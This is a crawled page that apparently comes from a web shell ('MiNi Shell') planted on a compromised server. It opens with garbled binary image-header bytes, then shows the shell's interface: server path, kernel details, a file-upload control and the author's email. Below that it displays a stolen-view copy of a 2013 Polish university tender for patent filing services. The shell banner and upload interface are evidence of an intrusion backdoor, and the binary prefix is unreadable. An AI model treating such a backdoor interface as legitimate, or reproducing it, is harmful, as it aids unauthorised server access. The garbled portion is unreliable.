JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131105/232713-N-2013.html

<p class="kh_header"><b>Olsztyn: Świadczenie usługi przeprowadzenia kompleksowej procedury dokonania zgłoszenia patentowego krajowego i zagranicznego w zakresie technologii dotyczącej urządzenia z granulowanymi glonami do intensywnego pochłaniania CO2 opracowanej przez naukowców Wydziału Ochrony Środowiska i Rolnictwa Uniwersytetu Warmińsko-Mazurskiego w Olsztynie, objętej projektem współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Rozwoju pt. Uzyskanie ochrony własności intelektualnej na urządzenie do intensywnego pochłaniania CO2, (nr umowy: WND-POIG.01.03.02-28-079/12)</b><br>
<b>Numer ogłoszenia: 232713 - 2013; data zamieszczenia: 05.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie , ul. Oczapowskiego 2, 10-719 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5233420, faks (089) 5233278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> uwm.edu.pl/zamowienia</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi przeprowadzenia kompleksowej procedury dokonania zgłoszenia patentowego krajowego i zagranicznego w zakresie technologii dotyczącej urządzenia z granulowanymi glonami do intensywnego pochłaniania CO2 opracowanej przez naukowców Wydziału Ochrony Środowiska i Rolnictwa Uniwersytetu Warmińsko-Mazurskiego w Olsztynie, objętej projektem współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Rozwoju pt. Uzyskanie ochrony własności intelektualnej na urządzenie do intensywnego pochłaniania CO2, (nr umowy: WND-POIG.01.03.02-28-079/12).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiot usługi: 
1.Przedmiotem zamówienia jest świadczenie usługi przeprowadzenia kompleksowej procedury dokonania zgłoszenia patentowego krajowego i zagranicznego w zakresie technologii dotyczącej urządzenia z granulowanymi glonami do intensywnego pochłaniania CO2 opracowanej przez naukowców Wydziału Ochrony Środowiska i Rolnictwa Uniwersytetu Warmińsko-Mazurskiego w Olsztynie, objętej projektem współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Rozwoju pt. Uzyskanie ochrony własności intelektualnej na urządzenie do intensywnego pochłaniania CO2, (nr umowy: WND-POIG.01.03.02-28-079/12)
II. Zakres przedmiotowy usługi: 
1.	Obsługa zgłoszenia krajowego w Urzędzie Patentowym RP, w tym:
1.1.	przeprowadzenie badania stanu techniki i badania czystości patentowej (termin: 28.02.2014 r.);
1.2.	opracowanie dokumentacji zgłoszeniowej do Urzędu Patentowego RP we współpracy
z twórcami i Zamawiającym podczas spotkań w siedzibie Zamawiającego: przygotowanie opisów, rysunków technicznych, formularzy itp. (termin: 28.02.2014 r.);
1.3.	dokonanie zgłoszenia w Urzędzie Patentowym RP - przyjęcie terminu zgłoszenia wynalazku w UPRP jako daty pierwszeństwa (termin: 31.03.2014 r.)  oraz  reprezentowanie Zamawiającego jako pełnomocnik w postępowaniu przed Urzędem Patentowym RP - do czasu otrzymania ostatecznej odpowiedzi nt. udzielenia patentu obejmujące w szczególności:
a)	dokonywanie wszelkich czynności w tym postępowaniu w tym przygotowanie zmian w zgłoszeniu, odwołań oraz prowadzenie korespondencji z Urzędem Patentowym RP dotyczącej zgłoszenia, we współpracy z twórcami i Zamawiającym, do czasu otrzymania ostatecznej odpowiedzi nt. udzielenia patentu;
b)	dokonanie urzędowych opłat wymaganych w celu uzyskania ochrony - do czasu otrzymania ostatecznej odpowiedzi nt. udzielenia patentu.
2.	Obsługa zgłoszenia międzynarodowego w Urzędzie Patentowym RP wg procedury zgłoszeniowej w systemie PCT w USA, Chinach, Rosji, Ukrainie oraz Europie, w tym:
2.1.	opracowanie dokumentacji zgłoszeniowej do Urzędu Patentowego z uwzględnieniem odpowiednich formularzy (termin: 31.08.2014 r.);
2.2.	tłumaczenie dokumentów na j. angielski, w którym dokonywane jest zgłoszenie wg procedury PCT (termin: 31.08.2014 r.);
2.3.	dokonanie zgłoszenia patentowego w trybie PCT (z uwzględnieniem daty pierwszeństwa) we współpracy z twórcami/Zamawiającym podczas spotkań w  siedzibie Zamawiającego (termin: 31.10.2014 r.) oraz reprezentowanie obejmujące w szczególności:
a)	dokonanie wszelkich niezbędnych czynności wymaganych w procedurze PCT w celu uzyskania ochrony międzynarodowej wg procedury zgłoszeniowej w systemie PCT w USA, Chinach, Rosji, Ukrainie oraz Europie - do czasu otrzymania ostatecznej odpowiedzi nt. udzielenia patentów,
b)	przygotowanie zmian w zgłoszeniu, odwołań oraz prowadzenie korespondencji z Urzędem Patentowym/Urzędami Patentowymi dotyczącej zgłoszenia we współpracy z twórcami i Zamawiającym - do czasu otrzymania ostatecznej odpowiedzi nt. udzielenia patentów, 
c)	dokonanie wszystkich urzędowych opłat wymaganych w celu uzyskania ochrony międzynarodowej wg procedury zgłoszeniowej w systemie PCT w USA, Chinach, Rosji, Ukrainie oraz Europie;
d)	w końcowym etapie fazy międzynarodowej, z zachowaniem obowiązujących terminów, uiszczenie wymaganych opłat krajowych/ regionalnych, dostarczenie tłumaczenia zgłoszenia na język urzędowy danego kraju/ regionu (Chiny, USA, Rosja, Ukraina, Europa) oraz zapewnienie zawodowego przedstawiciela (jeżeli istnieje taka konieczność) oraz dokonanie zgłoszeń w wybranych przez zamawiającego krajach/ regionach (po wejściu w fazę krajową/regionalną - do 20 miesięcy od daty pierwszeństwa (termin: 30.11.2015 r.).
III. Sposób realizacji:
1.	Wykonawca jest zobowiązany do pisemnego raportowania przebiegu procesu zgłaszania ochrony patentowej wynalazku w poszczególnych krajach.
2.	Wykonawca jest zobowiązany do przekazywania raportu z podjętych czynności w terminie 3 dni po upływie każdego miesiąca, w formie PDF lub XLS;
3.	Zamawiający wymaga aby Wykonawca przekazywał Zamawiającemu wszystkie dokumenty pozyskane w ramach realizacji umowy a związane z realizacją przedmiotowej usługi w formie skanu oraz oryginału przesłanego listownie.
IV. Termin realizacji:
1.	Przewidywany termin wykonania zamówienia: od dnia zawarcia umowy do dnia 31 grudzień 2015 r. 
2.	Sposób realizacji umowy:
a)	zgłoszenia krajowe należy wykonać do dnia 30 czerwca 2014 r. 
b)	zgłoszenie międzynarodowe należy wykonać w terminie: lipiec 2014 r. - 31.12.2015 r. 
c)	szczegółowy harmonogram prac zawarty rozdziale II opisu przedmiotu zamówienia.
V. Sposób i warunki płatności:
1.	Za wykonanie usługi będącej przedmiotem niniejszej umowy, Zamawiający zapłaci Wykonawcy wynagrodzenie ryczałtowe tj. na podstawie faktur VAT, wystawianych każdorazowo po dokonaniu czynności koniecznych do realizacji przedmiotowego zamówienia.
2.	Faktura VAT musi zawierać numer umowy z której wynika płatność.
3.	Podstawą do wystawienia faktury jest podpisanie przez obie strony, protokołu odebranych prac zgodnie z Załącznikiem nr 2 do niniejszej umowy,  przyjętego jako bez zastrzeżeń.
4.	Zamawiający zapłaci należność wynikającą z danej faktury VAT przelewem na konto wskazane przez Wykonawcę, w terminie do 30 dni od daty otrzymania prawidłowo wystawionej faktury.
5.	Za każdą część w ratach po wykonaniu określonych etapów:
5.1.	Cześć pierwsza obejmująca zgłoszenie krajowe w Urzędzie Patentowym RP:
5.1.1.	20% ceny po wykonaniu czynności określonych w §1 ust.2 lit. (a) pkt. 1) istotnych warunków umowy wg Załącznika nr 6 do SIWZ tj. przeprowadzenie badania stanu techniki i badania czystości patentowej w terminie do dnia 28.02.2014 r. ;
5.1.2.	35 % ceny po wykonaniu czynności określonych w §1 ust.2 lit. (a) pkt. 2) istotnych warunków umowy wg Załącznika nr 6 do SIWZ tj. opracowanie dokumentacji zgłoszeniowej do Urzędu Patentowego RP we współpracy
z twórcami i Zamawiającym podczas spotkań w siedzibie Zamawiającego: przygotowanie opisów, rysunków technicznych, formularzy oraz wszelkich dokumentów wymaganych do złożenia zgłoszenia -  w terminie do dnia 28.02.2014 r.;
5.1.3.	pozostała część ceny określonej w §3 ust. 1 lit. (a) po złożeniu zgłoszenia w Urzędzie patentowym RP  zgodnie z w §1 ust.2 lit. (a) pkt. 3 ) tj. dokonanie zgłoszenia w Urzędzie Patentowym RP - przyjęcie terminu zgłoszenia wynalazku w UPRP jako daty pierwszeństwa w terminie do dnia 31.03.2014 r.  oraz  reprezentowanie Zamawiającego jako pełnomocnik w postępowaniu przed Urzędem Patentowym RP - do czasu otrzymania ostatecznej odpowiedzi nt. udzielenia patentu obejmujące w szczególności :
a)	dokonywanie wszelkich czynności w tym postępowaniu w tym przygotowanie zmian w zgłoszeniu, odwołań oraz prowadzenie korespondencji z Urzędem Patentowym RP dotyczącej zgłoszenia, we współpracy z twórcami i Zamawiającym, do czasu otrzymania ostatecznej odpowiedzi nt. udzielenia patentu;
b)	dokonanie urzędowych opłat wymaganych w celu uzyskania ochrony - do czasu otrzymania ostatecznej odpowiedzi nt. udzielenia patentu.
5.2.	Cześć druga obejmująca obsługę zgłoszenia międzynarodowego w Urzędzie Patentowym RP wg procedury zgłoszeniowej w systemie PCT w USA, Chinach, Rosji, Ukrainie oraz Europie:
5.2.1.	30 % ceny określonej w §3 ust. 1 lit. (b) - po wykonaniu czynności określonych w §1 ust.2 lit. (b) pkt. 1) i 2)  tj. opracowanie dokumentacji zgłoszeniowej do Urzędu Patentowego z uwzględnieniem odpowiednich formularzy w terminie do dnia 31.08.2014 r., oraz wykonanie tłumaczenia dokumentów na j. angielski, w którym dokonywane jest zgłoszenie wg procedury PCT w terminie do dnia 31.08.2014 r.;
5.2.2.	30 % ceny określonej w §3 ust. 1 lit. (b) - po wykonaniu czynności określonych w §1 ust.2 lit. (b) pkt. 3) tj.  dokonanie zgłoszenia patentowego w trybie PCT (z uwzględnieniem daty pierwszeństwa) we współpracy z twórcami/Zamawiającym podczas spotkań w siedzibie Zamawiającego w terminie do dnia 31.10.2014 r. oraz reprezentowanie obejmujące w szczególności:
a)	dokonanie wszelkich niezbędnych czynności wymaganych w procedurze PCT w celu uzyskania ochrony międzynarodowej wg procedury zgłoszeniowej w systemie PCT w USA, Chinach, Rosji, Ukrainie oraz Europie - do czasu otrzymania ostatecznej odpowiedzi nt. udzielenia patentów;
b)	przygotowanie zmian w zgłoszeniu, odwołań oraz prowadzenie korespondencji z Urzędem Patentowym/Urzędami Patentowymi dotyczącej zgłoszenia we współpracy z twórcami i Zamawiającym - do czasu otrzymania ostatecznej odpowiedzi nt. udzielenia patentów;
c)	 dokonanie wszystkich urzędowych opłat wymaganych w celu uzyskania ochrony międzynarodowej wg procedury zgłoszeniowej w systemie PCT w USA, Chinach, Rosji, Ukrainie oraz Europie.
5.2.3.	40 % ceny określonej w §3 ust. 1 lit. (b) - po wykonaniu czynności określonych w §1 ust.2 lit. (b) pkt. 4) tj. w końcowym etapie fazy międzynarodowej, z zachowaniem obowiązujących terminów, uiszczenie wymaganych opłat krajowych/ regionalnych, dostarczenie tłumaczenia zgłoszenia na język urzędowy danego kraju/ regionu (Chiny, USA, Rosja, Ukraina, Europa) oraz zapewnienie zawodowego przedstawiciela (jeżeli istnieje taka konieczność) oraz dokonanie zgłoszeń w wybranych przez zamawiającego krajach/ regionach (po wejściu w fazę krajową/regionalną - do 20 miesięcy od daty pierwszeństwa nie później niż w terminie do dnia 30.11.2015 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.12.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunków udziału w postępowaniu tj. posiadania wiedzy i doświadczenia, Wykonawca wykaże posiadanie wiedzy i doświadczenia związanego z realizacją minimum wykonał minimum 7 USŁUG polegających na zgłoszeniu wynalazku w tym: minimum 2 usługi polegające na zgłoszeniu wynalazku w procedurze PCT w zakresie niezbędnym do wykazania spełniania warunku, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie o wartości nie mniejszej niż 90.000,00 zł (brutto) każda, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie. Wykonawca który wykaże się największą liczbą wykonanych usług otrzyma maksymalną liczbą punktów a pozostałym Wykonawcom Zamawiający przyzna punktację zamieszczoną poniżej. 8 usług - 5 pkt.; 9 usług - 10 pkt.; 10 usług - 15 pkt; 11 usług i więcej - 20 pkt. Zamawiający nie przyznaje punktów za spełnienie warunków udziału w postępowaniu tj. minimum 7 usług</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunków udziału w postępowaniu tj. posiadania osób zdolnych do wykonania zamówienia, Wykonawca wykaże, że dysponuje lub będzie dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia i posiadają niezbędną wiedzę i doświadczenie tj. 1.osoba posiadająca uprawnienie do wykonywania zawodu radcy prawnego, adwokata i posiadająca również minimum 5 lat doświadczenia w zakresie świadczenia usług prawnych w dziedzinie prawa własności intelektualnej, z biegłą znajomością w mowie i piśmie języków polskiego i angielskiego; 2.osoba posiadająca wykształcenie wyższe i uprawnienia europejskiego rzecznika patentowego z minimum 5 letnim doświadczeniem, z biegła znajomością w mowie i piśmie języków polskiego, angielskiego i drugiego języka urzędowego EPO (Europejskiego Urzędu Patentowego)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	W zakresie warunków udziału w postępowaniu tj. posiadania sytuacji ekonomicznej i finansowej, Wykonawca wykaże spełnianie warunku dotyczącego sytuacji ekonomicznej i finansowej - opłaconą polisą a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 1.000.000,00 złotych brutto</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego; 2. Wypełniony i podpisany formularz Opis przedmiotu zamówienia (sporządzony zgodnie z Załącznikiem nr 1 do SIWZ, zamieszczonym na stronie : www.uwm.edu.pl/zamowienia ); 3. Wypełniony i podpisany formularz oferty (sporządzony zgodnie z Załącznikiem nr 2 do SIWZ, zamieszczonym na stronie : www.uwm.edu.pl/zamowienia); 4. Oświadczenie z art. 22 sporządzone zgodnie z Załącznikiem nr 3 do SIWZ, zamieszczonym na stronie : www.uwm.edu.pl/zamowienia); 5. Oświadczenie o braku podstaw do wykluczenia z postępowania sporządzone zgodnie z Załącznikiem nr 4 do SIWZ, zamieszczonym na stronie : www.uwm.edu.pl/zamowienia); 6. Oświadczenie z art. 24 ust. 2 pkt. 5 Ustawy Pzp sporządzone zgodnie z Załącznikiem nr 5 do SIWZ, zamieszczonym na stronie : www.uwm.edu.pl/zamowienia); 7. Wykaz usług sporządzony zgodnie z Załącznikiem nr 7 do SIWZ, zamieszczonym na stronie : www.uwm.edu.pl/zamowienia); 8. Wykaz osób sporządzony zgodnie z Załącznikiem nr 8 do SIWZ, zamieszczonym na stronie : www.uwm.edu.pl/zamowienia)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Wiedza i doświadczenie - 50</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy
w stosunku do treści oferty w przypadku:
1.1.ustawowej zmiany wysokości stawki podatku VAT. Zamawiający wyraża zgodę na zmianę cen brutto w trakcie realizacji umowy, w przypadku ustawowej zmiany wysokości stawki podatku VAT dla zamawianej usługi. Wówczas Zamawiający zapłaci Wykonawcy cenę netto plus należność według obowiązującej stawki podatku VAT;
1.2.możliwości zmiany terminu wykonania zlecenia określonego przez Strony notatką 
służbową (§2 ust. 3 umowy) z powodu zaistnienia obiektywnych okoliczności powodujących, że Wykonawca nie będzie mógł dotrzymać terminu oraz powiadomi o tym fakcie Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uwm.edu.pl/zamowienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie Dział Zamówień Publicznych ul. Oczapowskiego 2, pok. 305, 10-719 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2013 godzina 10:00, miejsce: Uniwersytet Warmińsko-Mazurski w Olsztynie Dział Zamówień Publicznych ul. Oczapowskiego 2, pok. 311, 10-719 Olsztyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Rozwoju pt. Uzyskanie ochrony własności intelektualnej na urządzenie do intensywnego pochłaniania CO2 (nr umowy: WND-POIG.01.03.02-28-079/12).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com